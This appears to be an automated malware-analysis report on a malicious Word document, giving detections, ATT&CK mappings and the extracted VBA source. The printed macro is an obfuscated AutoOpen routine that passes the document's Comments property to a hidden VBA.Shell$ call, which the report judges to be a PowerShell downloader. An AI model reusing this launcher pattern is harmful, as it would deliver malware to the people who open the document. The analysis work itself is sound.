MALICIOUS
212
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The autoopen macro executes a Shell() call, which in turn references PowerShell. This indicates the macro is designed to download and execute a second-stage payload, likely via PowerShell. The ClamAV detection name 'Doc.Macro.DollarShell' further supports this analysis.
Heuristics 8
-
ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
ebbRTBFM = "NVGHZCgRGFN" + "ybzcFWSPbY" + "LfMkfxGd" + "LCCWUdDB" + "ndLygsgbak" + "fmCtWctKhY" + "agmLMdYt" + tFdnZyN = "UcrVbdeVFTW" + "FmrseLA" + "fSRkkBuerGf" + "vcsYTtLsas" + "HRPKERehx" + "KvhFNymkY" + "FBMgLpHZW" + RaDVhAM = "RUMeCZP" + "rFevcgb" + "dBnyFhUPn" + "LgSraHWMnsK" + "WSyECXp" + "MHNgRySGNMU" + "MSRDtwS" + cZPVGvR = "athdtPpxTk" + "tdHAPRvkD" + "WhetKTvXVY" + "RPFsPdv" + "PFbHtBGhH" + "NMBANNwaDds" + "aWYNtrrU" + "BBXNYcWSP" VBA.Shell$ "" + rZCrTyu + gwUYEwFGR + SdCKBWRmm + dPgDectFAEK + zMZyYEh + GChpZzBgR + hkvnTphzVg + SgZmpppR + ActiveDocument.BuiltInDocumentProperties("Comme" + "nts") + rZCrTyu + gwUYEwFGR + SdCKBWRmm + dPgDectFAEK + zMZyYEh + GChpZzBgR + hkvnTphzVg + SgZmpppR + sNhYNbxua, 0 hZvnrDN = "zAEMZgBXATm" + "ZAhxtXm" + "xBCMkTRArZs" + "mcfPrznnKB" + "ztXTTLkrshU" + "BAnrHda" + "BLfMSWdEN" + TAeDWpm = "NEYBPbz" + "dYbUxrTzA" + "bkYNBvcKf" + "aGBNkUbhS" + "FLNYbpdHPzh" + "cUhhPCMMK" + "HppCTmXYAx" + aVNHeGntBc = "uUMbeAYf" + "CwZEARSew" + "zMBsKCF" + "uUmexuzkFwn" + "cpvscrP" + "FbzEWuRyRZX" + "wMMASWhrfC" + fCcAfNvw = "PrgRADKSZKD" + "PNAAMkm" + "MvarReXTzeC" + "frYcTFUe" + "grUpbNyy" + "KvuseXBhC" + "LdRscrpCp" + PbBXTEyXDg = "EXXvpXyv" + "xEdcpyZnERE" + "LUHHCmphpXR" + "S … -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "Module1" Sub autoopen() YPBALtUaxa -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4505 bytes |
SHA-256: ca7e6c2321e7ba1e0eaa37212c8e90de603de3cb521eacff84bb170b5bf12673 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
256 of 307 identifiers look randomly generated (e.g. 'UrYngTuwudm') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub autoopen()
YPBALtUaxa
End Sub
Function YPBALtUaxa()
LXxeuxgW = "WsKaCMuKU" + "pSbWwraCzK" + "vNZECzw" + "GRtZHMUNKxb" + "rDNkdeDH" + "DYnDmzfuZaV" + "RxdZuREUTKd" + KPHsVttxfBg = "RxzkKtCmM" + "sVdsXBppZ" + "zFuyFtSWh" + "LtAYsKBMK" + "SsSyLtfYmy" + "rGVxsLF" + "EcekhReVpLT" + vSNPHwVDHVx = "FyAWuwyU" + "RespRFT" + "czgPUeW" + "BUghykR" + "fYCWeHyS" + "MCDwxvgssMW" + "dKuCNTgWbfs" + bepZFRv = "XtCUWTDrmMv" + "MruufYeUR" + "PymSCENgkWh" + "mNrCGdD" + "gPDYdbBF" + "kwUmUXGMRXn" + "wfGLRRHR" + cmbFMfzX = "mvdTxDArt" + "nFSUzznK" + "gkuLNVz" + "HxNCCTWX" + "CHSvbdbdnyc" + "TRDULTsMGwV" + "BCGCBaK" + mFeewxy = "AUSYGPHwv" + "nBKyVvhfCYP" + "AkRpekv" + "AAPRMUNP" + "BUxhmvKchA" + "VMNkMCHS" + "CgfMeYPhFzW" + "wUGCYgCd"
ZFktLfW = "pguKBuA" + "fczercYgB" + "mBEzKDtCnWW" + "ZCZXyAt" + "BUhKfda" + "CnswDUA" + "zUXuKYSfFxX" + ySmvTnEbFS = "FxfzBuZhcs" + "DwTyMsShaDd" + "VeXfLaK" + "TNZvPrwxXvD" + "VyyRRbg" + "RftYgZS" + "BAxWvmcreT" + TFFystv = "MkYHprk" + "ecZfRBdCmmM" + "fFFVeEfC" + "ELWEXuUw" + "rtkCUtp" + "MPxbtAz" + "wTXBvaZusmZ" + "WAGGhmt"
VadCGdgd = "CtRSuxRLK" + "uZkbYfSR" + "dNXkYwKpF" + "sVKWfWytZ" + "fMaBeHVu" + "UTAaUgZtTXA" + "cLeaWVWhsp" + PePbMHYCp = "fyGPBHu" + "MxCTZzP" + "NEReWKHDRh" + "wPNnDsYUV" + "hyrmXrE" + "TwTFWUvnKYk" + "rsuLVGRZ" + tZBPeMgZgmb = "YzNgyKmzvRx" + "CsUZzDXw" + "ZMKYFckG" + "DXWTRRnCLht" + "mUHPVdbM" + "YKVSwncRTRp" + "KtGHVZbPV" + LdSYNHb = "VMsxhNG" + "XfvYKynMy" + "enUEHYA" + "mGVRSfbZykn" + "frAgyuCFKaB" + "kkbETbt" + "hSCDBhRVrda" + "TNARYcY"
ebbRTBFM = "NVGHZCgRGFN" + "ybzcFWSPbY" + "LfMkfxGd" + "LCCWUdDB" + "ndLygsgbak" + "fmCtWctKhY" + "agmLMdYt" + tFdnZyN = "UcrVbdeVFTW" + "FmrseLA" + "fSRkkBuerGf" + "vcsYTtLsas" + "HRPKERehx" + "KvhFNymkY" + "FBMgLpHZW" + RaDVhAM = "RUMeCZP" + "rFevcgb" + "dBnyFhUPn" + "LgSraHWMnsK" + "WSyECXp" + "MHNgRySGNMU" + "MSRDtwS" + cZPVGvR = "athdtPpxTk" + "tdHAPRvkD" + "WhetKTvXVY" + "RPFsPdv" + "PFbHtBGhH" + "NMBANNwaDds" + "aWYNtrrU" + "BBXNYcWSP"
VBA.Shell$ "" + rZCrTyu + gwUYEwFGR + SdCKBWRmm + dPgDectFAEK + zMZyYEh + GChpZzBgR + hkvnTphzVg + SgZmpppR + ActiveDocument.BuiltInDocumentProperties("Comme" + "nts") + rZCrTyu + gwUYEwFGR + SdCKBWRmm + dPgDectFAEK + zMZyYEh + GChpZzBgR + hkvnTphzVg + SgZmpppR + sNhYNbxua, 0
hZvnrDN = "zAEMZgBXATm" + "ZAhxtXm" + "xBCMkTRArZs" + "mcfPrznnKB" + "ztXTTLkrshU" + "BAnrHda" + "BLfMSWdEN" + TAeDWpm = "NEYBPbz" + "dYbUxrTzA" + "bkYNBvcKf" + "aGBNkUbhS" + "FLNYbpdHPzh" + "cUhhPCMMK" + "HppCTmXYAx" + aVNHeGntBc = "uUMbeAYf" + "CwZEARSew" + "zMBsKCF" + "uUmexuzkFwn" + "cpvscrP" + "FbzEWuRyRZX" + "wMMASWhrfC" + fCcAfNvw = "PrgRADKSZKD" + "PNAAMkm" + "MvarReXTzeC" + "frYcTFUe" + "grUpbNyy" + "KvuseXBhC" + "LdRscrpCp" + PbBXTEyXDg = "EXXvpXyv" + "xEdcpyZnERE" + "LUHHCmphpXR" + "SyuBTBGSG" + "EBfdfaWP" + "MtgxaGC" + "PfxYdtzCWtb" + ZryTTckxYPf = "ZhAyuant" + "gkXhpaH" + "XTYbKbhZGVA" + "tFmhVnR" + "gXKRAers" + "kTHZrxKVBk" + "NGcwzdsLV" + "pDuZtEGx"
nevByfzD = "YyzpDedfr" + "BkUFdGLKEP" + "tZZnVny" + "kVxyDpBUbe" + "BHmmtxs" + "bVTRGXh" + "zWtSrLD" + yAPMvhesKK = "YvzBwVhw" + "WvbDeNRgm" + "HGmxRKpeccm" + "GKEXXuEE" + "EFdUevzfcdu" + "dASKDCw" + "UrYngTuwudm" + YWnXHVmbrSr = "UmBWZzdBLe" + "eWAZhNm" + "uhFcwDBzk" + "nHhgBLCkcKV" + "RZvXMymAw" + "FadhENfdv" + "SsCaYfh" + UwWvTmfR = "brYLsbAwd" + "dfbPcNdGrGa" + "DDZzwbGpbZ" + "RgvUeegFf" + "dZawxtuHYZA" + "svzuRKnVxRt" + "DkwNAKdEk" + ypRNFLz = "SDXbGkD" + "wBcBWbukvMm" + "HPMteNZx" + "VgTWNcbskYD" + "kRWGaGrebrB" + "zTZskDx" + "xXSDNkmk" + "ZkyfVYCCChK"
XKMKrVsuNH = "VWpnWtWz" + "NcvvvbfEx" + "evScFkctbE" + "gLYELnNenFZ" + "MspEUzMd" + "htLHGUXFdH" + "nVKCKsHa" + pLwNywrMpvT = "csFtNHbbnD" + "rfxEpKWn" + "zkKuyCXSLb" + "GCmStsTVCWD" + "CkcAgSN" + "NZFPvNaUt" + "GvrfrndDrSF" + ZSXAkVr = "gWkuMCs" + "kxhkZrYW" + "zvaSnrYuny" + "EmkzbBuax" + "UkvuyXMvzM" + "PUyyWDv" + "YwDLwWtwDhk" + sCdDehrXu = "UcDHkNdgGwS" + "YBhPFwUnkN" + "BCMYsFS" + "uDACKdVt" + "rVeXEAtn" + "ymYBaKA" + "tPxCaGYgcHn" + "vFXwLZecKMt"
mwDRyVaab = "WcWGVZxvbv" + "wLTzkvpWTZ" + "PEWXYXXvD" + "dVtGSfaTDW" + "HXnePFyw" + "vCsvdTNyc" + "MVByGEKXEzc" + mfKAYhzVYL = "VzznTVmW" + "LzxWFuCL" + "mgeVcxVF" + "BZkUkGtsBfC" + "bnTaUYFmsdT" + "ZdeYysxR" + "fDSwgeE" + "PCMpMucuwM"
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.